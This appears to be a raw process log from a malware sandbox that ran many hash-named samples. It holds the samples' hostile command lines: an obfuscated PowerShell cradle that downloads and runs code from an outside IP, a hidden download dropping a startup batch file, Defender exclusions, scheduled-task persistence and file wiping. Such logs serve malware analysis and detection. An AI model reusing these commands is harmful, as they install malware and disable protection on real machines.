"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=59FB5160D26394F31C9BABA9C2CBF396 --mojo-platform-channel-handle=2460 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=89A204ADF40E0B6D332F4745EBFD0971 --mojo-platform-channel-handle=2464 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\Desktop\2023-09-04\0e0e5c2cfdabbea0c06dc0469d2025057d381cbc531d3c7799a88336c33d4132.exe
"C:\Users\Admin\Desktop\2023-09-04\0e0e5c2cfdabbea0c06dc0469d2025057d381cbc531d3c7799a88336c33d4132.exe"
C:\Users\Admin\Desktop\2023-09-04\0e8ce281e417e03f6a428d872d9b0b7997f5063b259f520b51234c16c87dd0e3.exe
"C:\Users\Admin\Desktop\2023-09-04\0e8ce281e417e03f6a428d872d9b0b7997f5063b259f520b51234c16c87dd0e3.exe"
C:\Users\Admin\Desktop\2023-09-04\2b04a8ff2faa3346370bc021df7c81c78a688c00a4e67a1f64580e5a14501bee.exe
"C:\Users\Admin\Desktop\2023-09-04\2b04a8ff2faa3346370bc021df7c81c78a688c00a4e67a1f64580e5a14501bee.exe"
C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe
"C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe" "yatvoumatyxyebal.exe" ENABLE
C:\Users\Admin\Desktop\2023-09-04\5e184f6a7be1ee66c1bb770b66cf475c09d7ab4baaf36f9e0203041fc7098717.exe
"C:\Users\Admin\Desktop\2023-09-04\5e184f6a7be1ee66c1bb770b66cf475c09d7ab4baaf36f9e0203041fc7098717.exe"
C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe
"C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ipconfig /release
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /release
C:\Users\Admin\Desktop\2023-09-04\6f89a16231002ca16d388f2fee2ad80acca8c9e7e12d5f778881ac352c35dd8a.exe
"C:\Users\Admin\Desktop\2023-09-04\6f89a16231002ca16d388f2fee2ad80acca8c9e7e12d5f778881ac352c35dd8a.exe"
C:\Users\Admin\Desktop\2023-09-04\7c24993316855b8e855a8ea660369bf117784e27a9cf850e3936ff1e19250d8f.exe
"C:\Users\Admin\Desktop\2023-09-04\7c24993316855b8e855a8ea660369bf117784e27a9cf850e3936ff1e19250d8f.exe"
C:\Users\Admin\Desktop\2023-09-04\9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe
"C:\Users\Admin\Desktop\2023-09-04\9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe"
C:\Users\Admin\Desktop\2023-09-04\14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe
"C:\Users\Admin\Desktop\2023-09-04\14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe"
C:\Users\Admin\Desktop\2023-09-04\38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49.exe
"C:\Users\Admin\Desktop\2023-09-04\38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49.exe"
C:\Users\Admin\Desktop\2023-09-04\49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575.exe
"C:\Users\Admin\Desktop\2023-09-04\49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575.exe"
C:\Users\Admin\Desktop\2023-09-04\38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49.exe
"C:\Users\Admin\Desktop\2023-09-04\38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49.exe"
C:\Windows\SysWOW64\svchost.exe
"svchost.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF772.tmp.bat""
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Roaming\svchost.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Roaming\svchost.exe"'
C:\Windows\system32\timeout.exe
timeout 3
C:\Users\Admin\AppData\Roaming\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Windows\SysWOW64\svchost.exe
"C:\Windows\SysWOW64\svchost.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3876 -ip 3876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3876 -s 1416
C:\Windows\SysWOW64\explorer.exe
"explorer.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ipconfig /renew
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /renew
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe
"C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\2023-09-04\9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\pIQwCnkHxxbR.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pIQwCnkHxxbR" /XML "C:\Users\Admin\AppData\Local\Temp\tmp921C.tmp"
C:\Users\Admin\Desktop\2023-09-04\9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe
"C:\Users\Admin\Desktop\2023-09-04\9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/YimMenu/YimMenu/issues/new/choose
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd45b346f8,0x7ffd45b34708,0x7ffd45b34718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,17803311037409036651,10679173951299461945,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,17803311037409036651,10679173951299461945,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,17803311037409036651,10679173951299461945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2784 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,17803311037409036651,10679173951299461945,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,17803311037409036651,10679173951299461945,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
C:\Users\Admin\Desktop\2023-09-04\49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575.exe
"C:\Users\Admin\Desktop\2023-09-04\49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575.exe"
C:\Users\Admin\Desktop\2023-09-04\56a9c01b92c732b5581d84d366e37339503d8b99f966e99cea6bfcacd73864ec.exe
"C:\Users\Admin\Desktop\2023-09-04\56a9c01b92c732b5581d84d366e37339503d8b99f966e99cea6bfcacd73864ec.exe"
C:\Users\Admin\Desktop\2023-09-04\74bbf54c84c8a59a0f2f99487122908d30a5f04c32f16b633ff09e27a55273d6.exe
"C:\Users\Admin\Desktop\2023-09-04\74bbf54c84c8a59a0f2f99487122908d30a5f04c32f16b633ff09e27a55273d6.exe"
C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe
"C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe"
C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe
"C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe"
C:\Users\Admin\Desktop\2023-09-04\491b9d7756207e0bf6193028df506a3d3a4e2ee433f508cc262b364293b6e795.exe
"C:\Users\Admin\Desktop\2023-09-04\491b9d7756207e0bf6193028df506a3d3a4e2ee433f508cc262b364293b6e795.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Users\Admin\AppData\Local\Temp\ChromeClose.exe
"C:\Users\Admin\AppData\Local\Temp\ChromeClose.exe"
C:\Windows\SysWOW64\systray.exe
"C:\Windows\SysWOW64\systray.exe"
C:\Users\Admin\Desktop\2023-09-04\689e96c2e6efebbf0cd6c69bf01cd997a4e50bb1adc729d90ca26d49b4387fac.exe
"C:\Users\Admin\Desktop\2023-09-04\689e96c2e6efebbf0cd6c69bf01cd997a4e50bb1adc729d90ca26d49b4387fac.exe"
C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe"
C:\Users\Admin\Desktop\2023-09-04\7290bd84fb89cb251cef8db17aecf3f433b8ee2641cc2109026c77b519f8452e.exe
"C:\Users\Admin\Desktop\2023-09-04\7290bd84fb89cb251cef8db17aecf3f433b8ee2641cc2109026c77b519f8452e.exe"
C:\Users\Admin\Desktop\2023-09-04\9025cbcf8f758c9c16cf199ecd45576f61b00921701829343a607336b8e9a2cb.exe
"C:\Users\Admin\Desktop\2023-09-04\9025cbcf8f758c9c16cf199ecd45576f61b00921701829343a607336b8e9a2cb.exe"
C:\Users\Admin\Desktop\2023-09-04\9477b580ea937f47e54b9d6b022617c2e508fbed2f74f6ac3ed54c7861bf8b2d.exe
"C:\Users\Admin\Desktop\2023-09-04\9477b580ea937f47e54b9d6b022617c2e508fbed2f74f6ac3ed54c7861bf8b2d.exe"
C:\Users\Admin\Desktop\2023-09-04\9477b580ea937f47e54b9d6b022617c2e508fbed2f74f6ac3ed54c7861bf8b2d.exe
"C:\Users\Admin\Desktop\2023-09-04\9477b580ea937f47e54b9d6b022617c2e508fbed2f74f6ac3ed54c7861bf8b2d.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\eWFNFYkXygiAi.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eWFNFYkXygiAi" /XML "C:\Users\Admin\AppData\Local\Temp\tmpF507.tmp"
C:\Users\Admin\Desktop\2023-09-04\56a9c01b92c732b5581d84d366e37339503d8b99f966e99cea6bfcacd73864ec.exe
"C:\Users\Admin\Desktop\2023-09-04\56a9c01b92c732b5581d84d366e37339503d8b99f966e99cea6bfcacd73864ec.exe"
C:\Users\Admin\Desktop\2023-09-04\9506cdc2e1dcfdbc7b8be00e12b5bd2e4a2f6b10df353bb19f3affaaaaeafd30.exe
"C:\Users\Admin\Desktop\2023-09-04\9506cdc2e1dcfdbc7b8be00e12b5bd2e4a2f6b10df353bb19f3affaaaaeafd30.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\2023-09-04\38348d68f5d74a0babf439107a11206ec804c9358185c08ecb1fddb89c51e1f7.cmd" "
C:\Users\Admin\Desktop\2023-09-04\77939bc55f126f336599f79e2cec371a290be3f17d08ca83344118e97d314f27.exe
"C:\Users\Admin\Desktop\2023-09-04\77939bc55f126f336599f79e2cec371a290be3f17d08ca83344118e97d314f27.exe"
C:\Users\Admin\Desktop\2023-09-04\532021fc0305c2e6744cccbb73a30f64f7e86584b838e64e537d26bd4ba9dc0c.exe
"C:\Users\Admin\Desktop\2023-09-04\532021fc0305c2e6744cccbb73a30f64f7e86584b838e64e537d26bd4ba9dc0c.exe"
C:\Users\Admin\Desktop\2023-09-04\928900f2a698b6a791232f581192418a953064abbe11f6453cb0bdf7eeec26f2.exe
"C:\Users\Admin\Desktop\2023-09-04\928900f2a698b6a791232f581192418a953064abbe11f6453cb0bdf7eeec26f2.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Users\Admin\Desktop\2023-09-04\3659096c23b68f66ca65f00e41c47a3b0642b48240cd8b92143f8b6dc90ead82.exe
"C:\Users\Admin\Desktop\2023-09-04\3659096c23b68f66ca65f00e41c47a3b0642b48240cd8b92143f8b6dc90ead82.exe"
C:\Users\Admin\AppData\Local\Temp\ChromeClose.exe
"C:\Users\Admin\AppData\Local\Temp\ChromeClose.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2023-09-04\964555913ef321b88a1e52594f8438820230e704dd06f14768fafa9285038af9.wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/=//=//=//=//=//=//=//=//=//=/(''http://51.254.49.49:222/truintobroth/cod.jpg'')'.RePLACe('/=//=//=//=//=//=//=//=//=//=/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ShsyqjjdO.bat" "
C:\Users\Admin\Desktop\2023-09-04\a1528f5de37b949354a3cdd6e72ac966b4a0ec675d7a23b67af482ddcb94616d.exe
"C:\Users\Admin\Desktop\2023-09-04\a1528f5de37b949354a3cdd6e72ac966b4a0ec675d7a23b67af482ddcb94616d.exe"
C:\Users\Admin\Desktop\2023-09-04\a163afbf2a38849f7f9f8f39b17af32425d3d03b95b9a3f0af1af42faa0ab138.exe
"C:\Users\Admin\Desktop\2023-09-04\a163afbf2a38849f7f9f8f39b17af32425d3d03b95b9a3f0af1af42faa0ab138.exe"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\System32\SndVol.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 988 -ip 988
C:\Users\Admin\Desktop\2023-09-04\af384052c09f33cf47892ced9ac5de9c7a2cda37ae4aa72c08d54068db5b3284.exe
"C:\Users\Admin\Desktop\2023-09-04\af384052c09f33cf47892ced9ac5de9c7a2cda37ae4aa72c08d54068db5b3284.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c mkdir "\\?\C:\Windows "
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 988 -s 1844
C:\Users\Admin\Desktop\2023-09-04\b51c0c907444b390504c65e4d688a265f1698e2bcfc8a214ead20ef62f5d685a.exe
"C:\Users\Admin\Desktop\2023-09-04\b51c0c907444b390504c65e4d688a265f1698e2bcfc8a214ead20ef62f5d685a.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ClWWWrRvtgVoLl" /XML "C:\Users\Admin\AppData\Local\Temp\tmp9114.tmp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\ClWWWrRvtgVoLl.exe"
C:\Users\Admin\AppData\Local\Temp\funqkvhlditfbjgrn.exe
"C:\Users\Admin\AppData\Local\Temp\funqkvhlditfbjgrn.exe"
C:\Users\Admin\Desktop\2023-09-04\532021fc0305c2e6744cccbb73a30f64f7e86584b838e64e537d26bd4ba9dc0c.exe
"C:\Users\Admin\Desktop\2023-09-04\532021fc0305c2e6744cccbb73a30f64f7e86584b838e64e537d26bd4ba9dc0c.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\s1ek.0.bat" "
C:\Users\Admin\Desktop\2023-09-04\c5f256689f11369ee00414214fef56fb6eb22bb623835d676a02dfb561791200.exe
"C:\Users\Admin\Desktop\2023-09-04\c5f256689f11369ee00414214fef56fb6eb22bb623835d676a02dfb561791200.exe"
C:\Users\Admin\Desktop\2023-09-04\ce14e600e9fabbe76c755ebf23c96be8cda1054c4cd00ef0c0d8b3b8e04769ee.exe
"C:\Users\Admin\Desktop\2023-09-04\ce14e600e9fabbe76c755ebf23c96be8cda1054c4cd00ef0c0d8b3b8e04769ee.exe"
C:\Users\Admin\Desktop\2023-09-04\d431132bfaec0893a56532db7da1930c1621deb9ffaf1e56d549220b2b065e23.exe
"C:\Users\Admin\Desktop\2023-09-04\d431132bfaec0893a56532db7da1930c1621deb9ffaf1e56d549220b2b065e23.exe"
C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe
"C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\NzdSupOimejfx.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NzdSupOimejfx" /XML "C:\Users\Admin\AppData\Local\Temp\tmpDF53.tmp"
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Users\Admin\Desktop\2023-09-04\e4d5b043f5c9e0894a5f4a21c93cd7347a609a900da8f56f55a0dd84269e81f1.exe
"C:\Users\Admin\Desktop\2023-09-04\e4d5b043f5c9e0894a5f4a21c93cd7347a609a900da8f56f55a0dd84269e81f1.exe"
C:\Users\Admin\Desktop\2023-09-04\af384052c09f33cf47892ced9ac5de9c7a2cda37ae4aa72c08d54068db5b3284.exe
"C:\Users\Admin\Desktop\2023-09-04\af384052c09f33cf47892ced9ac5de9c7a2cda37ae4aa72c08d54068db5b3284.exe"
C:\Users\Admin\Desktop\2023-09-04\af384052c09f33cf47892ced9ac5de9c7a2cda37ae4aa72c08d54068db5b3284.exe
"C:\Users\Admin\Desktop\2023-09-04\af384052c09f33cf47892ced9ac5de9c7a2cda37ae4aa72c08d54068db5b3284.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c timeout /nobreak /t 3 & fsutil file setZeroData offset=0 length=8217423 "C:\Users\Admin\Desktop\2023-09-04\77939bc55f126f336599f79e2cec371a290be3f17d08ca83344118e97d314f27.exe" & erase "C:\Users\Admin\Desktop\2023-09-04\77939bc55f126f336599f79e2cec371a290be3f17d08ca83344118e97d314f27.exe" & exit
C:\Users\Admin\Desktop\2023-09-04\a163afbf2a38849f7f9f8f39b17af32425d3d03b95b9a3f0af1af42faa0ab138.exe
"C:\Users\Admin\Desktop\2023-09-04\a163afbf2a38849f7f9f8f39b17af32425d3d03b95b9a3f0af1af42faa0ab138.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nnweubxpxnavd.exe /TR "C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe" /F
C:\Windows\SysWOW64\timeout.exe
timeout /nobreak /t 3
C:\ProgramData\presepuesto\LEAJ.exe
"C:\ProgramData\presepuesto\LEAJ.exe"
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://gitlab.com/brum/teamfor/-/raw/main/st -OutFile "C:\\Users\\$([Environment]::UserName)\\AppData\\Roaming\\Microsoft\\Windows\\'Start Menu'\\Programs\\Startup\\WindowsSecure.bat";
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd3fbc9758,0x7ffd3fbc9768,0x7ffd3fbc9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.alibaba.com/
C:\Windows\SysWOW64\fsutil.exe
fsutil file setZeroData offset=0 length=8217423 "C:\Users\Admin\Desktop\2023-09-04\77939bc55f126f336599f79e2cec371a290be3f17d08ca83344118e97d314f27.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /RL HIGHEST /tn "LEAJ" /tr C:\ProgramData\presepuesto\LEAJ.exe /f
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Users\Admin\Desktop\2023-09-04\ce14e600e9fabbe76c755ebf23c96be8cda1054c4cd00ef0c0d8b3b8e04769ee.exe
"C:\Users\Admin\Desktop\2023-09-04\ce14e600e9fabbe76c755ebf23c96be8cda1054c4cd00ef0c0d8b3b8e04769ee.exe"
C:\Users\Admin\Desktop\2023-09-04\ce14e600e9fabbe76c755ebf23c96be8cda1054c4cd00ef0c0d8b3b8e04769ee.exe
"C:\Users\Admin\Desktop\2023-09-04\ce14e600e9fabbe76c755ebf23c96be8cda1054c4cd00ef0c0d8b3b8e04769ee.exe"
C:\Users\Admin\Desktop\2023-09-04\d431132bfaec0893a56532db7da1930c1621deb9ffaf1e56d549220b2b065e23.exe
"C:\Users\Admin\Desktop\2023-09-04\d431132bfaec0893a56532db7da1930c1621deb9ffaf1e56d549220b2b065e23.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\2023-09-04\c5f256689f11369ee00414214fef56fb6eb22bb623835d676a02dfb561791200.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\NIebSjcCgFnY.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NIebSjcCgFnY" /XML "C:\Users\Admin\AppData\Local\Temp\tmp8D37.tmp"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\ProgramData\presepuesto\LEAJ.exe
C:\ProgramData\presepuesto\LEAJ.exe
C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe
C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd45b346f8,0x7ffd45b34708,0x7ffd45b34718
C:\Users\Admin\AppData\Local\Temp\hmvxuotfje.exe
"C:\Users\Admin\AppData\Local\Temp\hmvxuotfje.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
